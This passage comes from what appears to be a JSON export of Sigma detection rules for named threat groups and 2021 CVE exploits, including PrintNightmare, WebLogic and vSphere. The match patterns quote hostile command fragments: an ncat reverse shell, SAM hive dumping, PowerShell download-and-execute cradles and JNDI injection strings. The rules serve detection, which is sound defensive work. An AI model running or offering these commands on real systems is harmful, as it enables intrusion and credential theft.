- ':\\ProgramData\\comms\\comms.exe'\n    selection_msf:\n        CommandLine|contains|all:\n            - '-ExecutionPolicy Bypass -File'\n            - '\\msf.ps1'\n    selection_ncat:\n        CommandLine|contains|all:\n            - 'infopagesbackup'\n            - '\\ncat'\n            - '-e cmd.exe'\n    selection_powershell:\n        CommandLine|contains:\n            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'\n            - '-nop -w hidden -c $k=new-object'\n            - '[Net.CredentialCache]::DefaultCredentials;IEX '\n            - ' -nop -w hidden -c $m=new-object net.webclient;$m'\n            - '-noninteractive -executionpolicy bypass whoami'\n            - '-noninteractive -executionpolicy bypass netstat -a'\n    selection_other:\n        CommandLine|contains: 'L3NlcnZlcj1'  # base64 encoded '/server='\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml",
    "content": "title: Lazarus Group Activity\nid: 24c4d154-05a4-4b99-b57d-9b977472443a\nrelated:\n    - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e\n      type: obsolete\nstatus: test\ndescription: Detects different process execution behaviors as described in various threat reports on Lazarus group activity\nreferences:\n    - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/\n    - https://www.hvs-consulting.de/lazarus-report/\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2020-12-23\nmodified: 2023-03-10\ntags:\n    - attack.g0032\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_generic:\n        CommandLine|contains:\n            - 'reg.exe save hklm\\sam %temp%\\~reg_sam.save'\n            - '1q2w3e4r@#$@#$@#$'\n            - ' -hp1q2w3e4 '\n            - '.dat data03 10000 -p '\n    selection_netstat:\n        CommandLine|contains|all:\n            - 'netstat -aon | find '\n            - 'ESTA'\n            - ' > %temp%\\~'\n    # Network share discovery\n    selection_network_discovery:\n        CommandLine|contains|all:\n            - '.255 10 C:\\ProgramData\\IBM\\'\n            - '.DAT'\n    selection_persistence:\n        CommandLine|contains|all:\n            - ' /c '\n            - ' -p 0x'\n        CommandLine|contains:\n            - 'C:\\ProgramData\\'\n            - 'C:\\RECYCLER\\'\n    selection_rundll32:\n        CommandLine|contains|all:\n            - 'rundll32 '\n            - 'C:\\ProgramData\\'\n        CommandLine|contains:\n            - '.bin,'\n            - '.tmp,'\n            - '.dat,'\n            - '.io,'\n            - '.ini,'\n            - '.db,'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Leviathan/registry_event_apt_leviathan.yml",
    "content": "title: Leviathan Registry Key Activity\nid: 70d43542-cd2d-483c-8f30-f16b436fd7db\nstatus: test\ndescription: Detects registry key used by Leviathan APT in Malaysian focused campaign\nreferences:\n    - https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign\nauthor: Aidan Bracher\ndate: 2020-07-07\nmodified: 2023-09-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd'\n    condition: selection\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/README.md",
    "content": "# SolarWinds’ Orion Supply Chain\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml",
    "content": "title: UNC2452 Process Creation Patterns\nid: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f\nstatus: test\ndescription: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries\nreferences:\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-22\nmodified: 2024-09-12\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\n    # - sunburst\n    # - unc2452\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # To avoid writing complex condition. \"selection_generic_1\" and \"selection_generic_2\" are the same except for the extension used.\n    selection_generic_1:\n        CommandLine|contains:\n            - '7z.exe a -v500m -mx9 -r0 -p'\n            - '7z.exe a -mx9 -r0 -p'\n        CommandLine|contains|all:\n            - '.zip'\n            - '.txt'\n    selection_generic_2:\n        CommandLine|contains:\n            - '7z.exe a -v500m -mx9 -r0 -p'\n            - '7z.exe a -mx9 -r0 -p'\n        CommandLine|contains|all:\n            - '.zip'\n            - '.log'\n    selection_generic_3:\n        ParentCommandLine|contains|all:\n            - 'wscript.exe'\n            - '.vbs'\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'C:\\Windows'\n            - '.dll,Tk_'\n    selection_generic_4:\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains|all:\n            - 'C:\\Windows'\n            - '.dll'\n        CommandLine|contains: 'cmd.exe /C '\n    selection_generic_5:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith: '\\dllhost.exe'\n        CommandLine: ''\n    condition: 1 of selection_generic_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml",
    "content": "title: UNC2452 PowerShell Pattern\nid: b7155193-8a81-4d8f-805d-88de864ca50c\nstatus: test\ndescription: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware\n    - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-20\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1047\n    - detection.emerging-threats\n    # - sunburst\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'Invoke-WMIMethod win32_process -name create -argumentlist'\n            - 'rundll32 c:\\windows'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - 'wmic /node:'\n            - 'process call create \"rundll32 c:\\windows'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml",
    "content": "title: Suspicious VBScript UN2452 Pattern\nid: 20c3f09d-c53d-4e85-8b74-6aa50e2f1b61\nstatus: test\ndescription: Detects suspicious inline VBScript keywords as used by UNC2452\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'Execute'\n            - 'CreateObject'\n            - 'RegRead'\n            - 'window.close'\n            - '\\Microsoft\\Windows\\CurrentVersion'\n    filter:\n        CommandLine|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/web_solarwinds_supernova_webshell.yml",
    "content": "title: Solarwinds SUPERNOVA Webshell Access\nid: a2cee20b-eacc-459f-861d-c02e5d12f1db\nstatus: test\ndescription: Detects access to SUPERNOVA webshell as described in Guidepoint report\nreferences:\n    - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/\n    - https://www.anquanke.com/post/id/226029\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-12-17\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains|all:\n            - 'logoimagehandler.ashx'\n            - 'clazz'\n    selection2:\n        cs-uri-query|contains: 'logoimagehandler.ashx'\n        sc-status: 500\n    condition: selection1 or selection2\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml",
    "content": "title: TAIDOOR RAT DLL Load\nid: d1aa3382-abab-446f-96ea-4de52908210b\nstatus: test\ndescription: Detects specific process characteristics of Chinese TAIDOOR RAT malware load\nreferences:\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-30\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1055.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'dll,MyStart'\n            - 'dll MyStart'\n    selection2a:\n        CommandLine|endswith: ' MyStart'\n    selection2b:\n        CommandLine|contains: 'rundll32.exe'\n    condition: selection1 or ( selection2a and selection2b )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml",
    "content": "title: Winnti Malware HK University Campaign\nid: 3121461b-5aa0-4a41-b910-66d25524edbb\nstatus: test\ndescription: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities\nreferences:\n    - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/\nauthor: Florian Roth (Nextron Systems), Markus Neis\ndate: 2020-02-01\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.g0044\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        ParentImage|contains:\n            - 'C:\\Windows\\Temp'\n            - '\\hpqhvind.exe'\n        Image|startswith: 'C:\\ProgramData\\DRM'\n    selection2:\n        ParentImage|startswith: 'C:\\ProgramData\\DRM'\n        Image|endswith: '\\wmplayer.exe'\n    selection3:\n        ParentImage|endswith: '\\Test.exe'\n        Image|endswith: '\\wmplayer.exe'\n    selection4:\n        Image: 'C:\\ProgramData\\DRM\\CLR\\CLR.exe'\n    selection5:\n        ParentImage|startswith: 'C:\\ProgramData\\DRM\\Windows'\n        Image|endswith: '\\SearchFilterHost.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml",
    "content": "title: Winnti Pipemon Characteristics\nid: 73d70463-75c9-4258-92c6-17500fe972f2\nstatus: stable\ndescription: Detects specific process characteristics of Winnti Pipemon malware reported by ESET\nreferences:\n    - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2020-07-30\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.g0044\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains: 'setup0.exe -p'\n    selection_2:\n        CommandLine|contains: 'setup.exe'\n        CommandLine|endswith:\n            - '-x:0'\n            - '-x:1'\n            - '-x:2'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate setups that use similar flags\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/av_exploit_cve_2021_34527_print_nightmare.yml",
    "content": "title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection\nid: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561\nstatus: stable\ndescription: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .\nreferences:\n    - https://twitter.com/mvelazco/status/1410291741241102338\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\nauthor: Sittikorn S, Nuttakorn T, Tim Shelton\ndate: 2021-07-01\nmodified: 2023-10-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.emerging-threats\n    - cve.2021-34527\n    - cve.2021-1675\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        Filename|contains: ':\\Windows\\System32\\spool\\drivers\\x64\\'\n    keywords:\n        - 'File submitted to Symantec' # symantec fp, pending analysis, more generic\n    condition: selection and not keywords\nfalsepositives:\n    - Unlikely, or pending PSP analysis\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/file_delete_win_exploit_cve_2021_1675_print_nightmare.yml",
    "content": "title: Potential PrintNightmare Exploitation Attempt\nid: 5b2bbc47-dead-4ef7-8908-0cf73fcbecbf\nstatus: test\ndescription: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://github.com/cube0x0/CVE-2021-1675\nauthor: Bhabesh Raj\ndate: 2021-07-01\nmodified: 2023-02-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\spoolsv.exe'\n        TargetFilename|contains: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_exploit_cve_2021_1675_printspooler.yml",
    "content": "title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern\nid: 2131cfb3-8c12-45e8-8fa0-31f5924e9f07\nstatus: test\ndescription: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\n    - https://github.com/cube0x0/CVE-2021-1675\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-29\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.resource-development\n    - attack.t1587\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/image_load_exploit_cve_2021_1675_spoolsv_dll_load.yml",
    "content": "title: Windows Spooler Service Suspicious Binary Load\nid: 02fb90de-c321-4e63-a6b9-25f4b03dfd14\nstatus: test\ndescription: |\n    Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare).\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://github.com/ly4k/SpoolFool\nauthor: FPT.EagleEye, Thomas Patzke (improvements)\ndate: 2021-06-29\nmodified: 2022-06-02\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\spoolsv.exe'\n        ImageLoaded|contains:\n            - '\\Windows\\System32\\spool\\drivers\\x64\\3\\'\n            - '\\Windows\\System32\\spool\\drivers\\x64\\4\\'\n        ImageLoaded|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Loading of legitimate driver\nlevel: informational\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/registry_event_cve_2021_1675_mimikatz_printernightmare_drivers.yml",
    "content": "title: PrinterNightmare Mimikatz Driver Name\nid: ba6b9e43-1d45-4d3c-a504-1043a64c8469\nstatus: test\ndescription: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527\nreferences:\n    - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760\n    - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n    - https://nvd.nist.gov/vuln/detail/cve-2021-1675\n    - https://nvd.nist.gov/vuln/detail/cve-2021-34527\nauthor: Markus Neis, @markus_neis, Florian Roth\ndate: 2021-07-04\nmodified: 2023-06-12\ntags:\n    - attack.execution\n    - attack.t1204\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810\\'\n            - '\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz'\n    selection_alt:\n        TargetObject|contains|all:\n            - 'legitprinter'\n            - '\\Control\\Print\\Environments\\Windows'\n    selection_print:\n        TargetObject|contains:\n            - '\\Control\\Print\\Environments'\n            - '\\CurrentVersion\\Print\\Printers'\n    selection_kiwi:\n        TargetObject|contains:\n            - 'Gentil Kiwi'\n            - 'mimikatz printer'\n            - 'Kiwi Legit Printer'\n    condition: selection or selection_alt or (selection_print and selection_kiwi)\nfalsepositives:\n    - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml",
    "content": "title: Possible CVE-2021-1675 Print Spooler Exploitation\nid: 4e64668a-4da1-49f5-a8df-9e2d5b866718\nstatus: test\ndescription: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675\nreferences:\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\n    - https://twitter.com/fuzzyf10w/status/1410202370835898371\nauthor: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton\ndate: 2021-06-30\nmodified: 2022-11-15\ntags:\n    - attack.execution\n    - attack.t1569\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: printservice-admin\ndetection:\n    selection:\n        EventID: 808\n        ErrorCode:\n            - '0x45A'\n            - '0x7e'\n    keywords:\n        - 'The print spooler failed to load a plug-in module'\n        # default file names used in PoC codes\n        - 'MyExploit.dll'\n        - 'evil.dll'\n        - '\\addCube.dll'\n        - '\\rev.dll'\n        - '\\rev2.dll'\n        - '\\main64.dll'\n        - '\\mimilib.dll'\n        - '\\mimispool.dll'\n    falsepositive:\n        - ' registration timed out' # ex: The print spooler failed to load a plug-in module PrintConfig registration timed out\n    condition: (selection or keywords) and not falsepositive\nfalsepositives:\n    - Problems with printer drivers\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml",
    "content": "title: CVE-2021-1675 Print Spooler Exploitation\nid: f34d942d-c8c4-4f1f-b196-22471aecf10a\nstatus: test\ndescription: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675\nreferences:\n    - https://twitter.com/MalwareJake/status/1410421967463731200\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-01\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1569\n    - cve.2021-1675\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: printservice-operational\ndetection:\n    selection:\n        EventID: 316\n    keywords:\n        - 'UNIDRV.DLL, kernelbase.dll, '\n        - ' 123 '\n        - ' 1234 '\n        - 'mimispool'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml",
    "content": "title: CVE-2021-1675 Print Spooler Exploitation IPC Access\nid: 8fe1c584-ee61-444b-be21-e9054b229694\nstatus: test\ndescription: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527\nreferences:\n    - https://twitter.com/INIT_3/status/1410662463641731075\nauthor: INIT_6\ndate: 2021-07-02\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.t1569\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: 'spoolss'\n        AccessMask: '0x3'\n        ObjectType: 'File'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-1675/zeek_dce_rpc_exploit_cve_2021_1675_printnightmare_print_driver_install.yml",
    "content": "title: Possible PrintNightmare Print Driver Install - CVE-2021-1675\nid: 7b33baef-2a75-4ca3-9da4-34f9a15382d8\nrelated:\n    - id: 53389db6-ba46-48e3-a94c-e0f2cefe1583\n      type: derived\nstatus: stable\ndescription: |\n    Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\n    The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29\n    - https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\n    - https://github.com/corelight/CVE-2021-1675\n    - https://old.zeek.org/zeekweek2019/slides/bzar.pdf\n    - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/\nauthor: '@neu5ron (Nate Guagenti)'\ndate: 2021-08-23\nmodified: 2025-11-03\ntags:\n    - attack.execution\n    - cve.2021-1678\n    - cve.2021-1675\n    - cve.2021-34527\n    - detection.emerging-threats\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    selection:\n        operation:\n            - 'RpcAsyncInstallPrinterDriverFromPackage' # \"76f03f96-cdfd-44fc-a22c-64950a001209\",0x3e\n            - 'RpcAsyncAddPrintProcessor' # \"76f03f96-cdfd-44fc-a22c-64950a001209\",0x2c\n            - 'RpcAddPrintProcessor' # \"12345678-1234-abcd-ef00-0123456789ab\",0x0e\n            - 'RpcAddPrinterDriverEx' # \"12345678-1234-abcd-ef00-0123456789ab\",0x59\n            - 'RpcAddPrinterDriver' # \"12345678-1234-abcd-ef00-0123456789ab\",0x09\n            - 'RpcAsyncAddPrinterDriver' # \"76f03f96-cdfd-44fc-a22c-64950a001209\",0x27\n    condition: selection\nfalsepositives:\n    - Legitimate remote alteration of a printer driver.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-20090/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml",
    "content": "title: Arcadyan Router Exploitations\nid: f0500377-bc70-425d-ac8c-e956cd906871\nstatus: test\ndescription: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.\nreferences:\n    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n    - https://www.tenable.com/security/research/tra-2021-13\n    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\nauthor: Bhabesh Raj\ndate: 2021-08-24\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-20090\n    - cve.2021-20091\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    path_traversal:\n        # CVE-2021-20090 (Bypass Auth: Path Traversal)\n        cs-uri-query|contains: '..%2f'\n    config_file_inj:\n        cs-uri-query|contains|all:\n            # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection)\n            - '..%2f'\n            - 'apply_abstract.cgi'\n    noauth_list:\n        cs-uri-query|contains:\n            - '/images/'\n            - '/js/'\n            - '/css/'\n            - '/setup_top_login.htm'\n            - '/login.html'\n            - '/loginerror.html'\n            - '/loginexclude.html'\n            - '/loginlock.html'\n    condition: (path_traversal or config_file_inj) and noauth_list\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-2109/web_cve_2021_2109_weblogic_rce_exploit.yml",
    "content": "title: Oracle WebLogic Exploit CVE-2021-2109\nid: 687f6504-7f44-4549-91fc-f07bab065821\nstatus: test\ndescription: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109\nreferences:\n    - https://twitter.com/pyn3rd/status/1351696768065409026\n    - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw\nauthor: Bhabesh Raj\ndate: 2021-01-20\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2021-2109\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - 'com.bea.console.handles.JndiBindingHandle'\n            - 'ldap://'\n            - 'AdminServer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-21972/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml",
    "content": "title: CVE-2021-21972 VSphere Exploitation\nid: 179ed852-0f9b-4009-93a7-68475910fd86\nstatus: test\ndescription: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972\nreferences:\n    - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n    - https://f5.pm/go-59627.html\n    - https://swarm.ptsecurity.com/unauth-rce-vmware\nauthor: Bhabesh Raj\ndate: 2021-02-24\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-21972\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query: '/ui/vropspluginui/rest/services/uploadova'\n    condition: selection\nfalsepositives:\n    - OVA uploads to your VSphere appliance\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-21978/web_cve_2021_21978_vmware_view_planner_exploit.yml",
    "content": "title: CVE-2021-21978 Exploitation Attempt\nid: 77586a7f-7ea4-4c41-b19c-820140b84ca9\nstatus: test\ndescription: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978\nreferences:\n    - https://twitter.com/wugeej/status/1369476795255320580\n    - https://paper.seebug.org/1495/\nauthor: Bhabesh Raj\ndate: 2020-03-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-21978\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - 'logupload'\n            - 'logMetaData'\n            - 'wsgi_log_upload.py'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-22005/web_cve_2021_22005_vmware_file_upload.yml",
    "content": "title: VMware vCenter Server File Upload CVE-2021-22005\nid: b014ea07-8ea0-4859-b517-50a4e5b7ecec\nstatus: test\ndescription: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.\nreferences:\n    - https://kb.vmware.com/s/article/85717\n    - https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server\nauthor: Sittikorn S\ndate: 2021-09-24\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-22005\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/analytics/telemetry/ph/api/hyper/send?'\n    condition: selection\nfalsepositives:\n    - Vulnerability Scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-22123/web_cve_2021_22123_fortinet_exploit.yml",
